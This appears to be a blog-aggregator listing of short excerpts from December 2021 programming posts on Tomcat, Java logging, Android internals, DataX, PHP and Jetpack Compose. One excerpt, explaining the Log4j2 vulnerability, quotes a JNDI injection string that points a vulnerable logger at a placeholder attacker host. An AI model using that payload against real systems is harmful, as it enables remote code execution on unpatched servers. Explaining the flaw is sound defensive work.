Tomcat deployment and optimization

1, Introduction Tomcat server is a free open source Web application server, which is a lightweight application server, It is widely used in small and medium-sized systems and not many concurrent access users. It is the first choice for developing and debugging JSP programs. For a beginner, you can think that when you configure Apache ser ...

Added by imperialized on Mon, 20 Dec 2021 22:05:34 +0200

Java logging framework learning notes

Java Log frame 0 mainstream Java logging framework Mainstream Java logging framework: ​ 1.JUL - can not be divided into days and files, and is supported to be eliminated ​ 2.log4j - old and mainstream log framework Log facade frame 3.JCL - only supports JUL and log4j, which is obsolete 4.slf4j - the main ...

Added by Chimera on Fri, 17 Dec 2021 15:15:36 +0200

Android Runtime | Trace file generation mechanism

This paper analyzes Android S(12) When ANR occurs in app or watchdog is triggered by System, the System wants to generate a trace file to record the call stack information of each thread and the status information of some processes / threads. This file is usually stored in the / data/anr directory and is not available to app developers. Howeve ...

Added by noelswanson on Thu, 16 Dec 2021 09:37:06 +0200

Recently, Log4j2 was exposed to high-risk vulnerabilities. How to reproduce the vulnerabilities and what is the principle?

​ I believe the most you see is this picture. I typed the code and came out with a calculator ​ String source = "${jndi:rmi://Hacker IP:1099/test} "; logger.error(source); The above code will not print out the string as expected, "${jndi:rmi: / / hacker ip: port / test}". If the log is printed in your own machine, you will st ...

Added by bigtimslim on Thu, 16 Dec 2021 09:21:15 +0200

Android recording - porting SoundTouch to Android

Android recording - porting SoundTouch to Android 1, SoundTouch introduction SoundTouch is an audio processing libraryThe main function of SoundTouch is to change the sound speed and tone.Official website( processes PCM data. 2, Porting SoundTouch(Android) 1. Download the source code Download ...

Added by nhan on Thu, 16 Dec 2021 03:08:07 +0200

Apache doris Datax DorisWriter extension usage

  DataX is an open source version of Alibaba cloud DataWorks data integration. It is an offline data synchronization tool / platform widely used in Alibaba group. DataX implements efficient data synchronization between various heterogeneous data sources, including MySQL, Oracle, SqlServer, Postgre, HDFS, Hive, ADS, HBase, TableStore(OTS), MaxC ...

Added by Salis on Wed, 15 Dec 2021 05:59:35 +0200

PHP learning notes

1, Object oriented programming 1. Class and object 1.1. Classes and objects Class class name {member}$object name = new class name (parameter); 1.2. Class encapsulation <?php class Person { // The following are the member properties of people, which are encapsulated private members private $name ; // People's names ...

Added by chitta_pk on Sat, 11 Dec 2021 14:46:48 +0200

Implementation principle of Viewstub

preface Recently, when the interviewer asked me how to use space occupying in ViewStub during the interview, I was confused. To tell the truth, I had seen very little about the internal code of some controls on the UI, so I couldn't answer at the moment. In fact, it's not very difficult, But we usually call it simply in the development process ...

Added by nicknax on Sat, 11 Dec 2021 02:48:11 +0200

Android Development: explanation of Jetpack Compose Button,IconButton and other buttons

preface This article will explain the usage of Button, iconbutton, extendedfloatingactionbutton, floatingactionbutton, icontogglebutton, outlinebutton, RadioButton and textbutton in detail. Please read below if you are interested 1: Button usage Let's take a look at the source code of the Button (the OutlinedButton has the same properties a ...

Added by zulx on Fri, 10 Dec 2021 10:53:52 +0200

Java web learning notes

Javaweb concept Technology for dynamic web resource development is collectively referred to as Java Web web application web applications: programs that provide browser access For web applications to provide external access: a server is required to unify Tomcat management; web application composition: html,CSS,jsjsp/servletJava Programs ...

Added by Nexus10 on Mon, 06 Dec 2021 04:45:42 +0200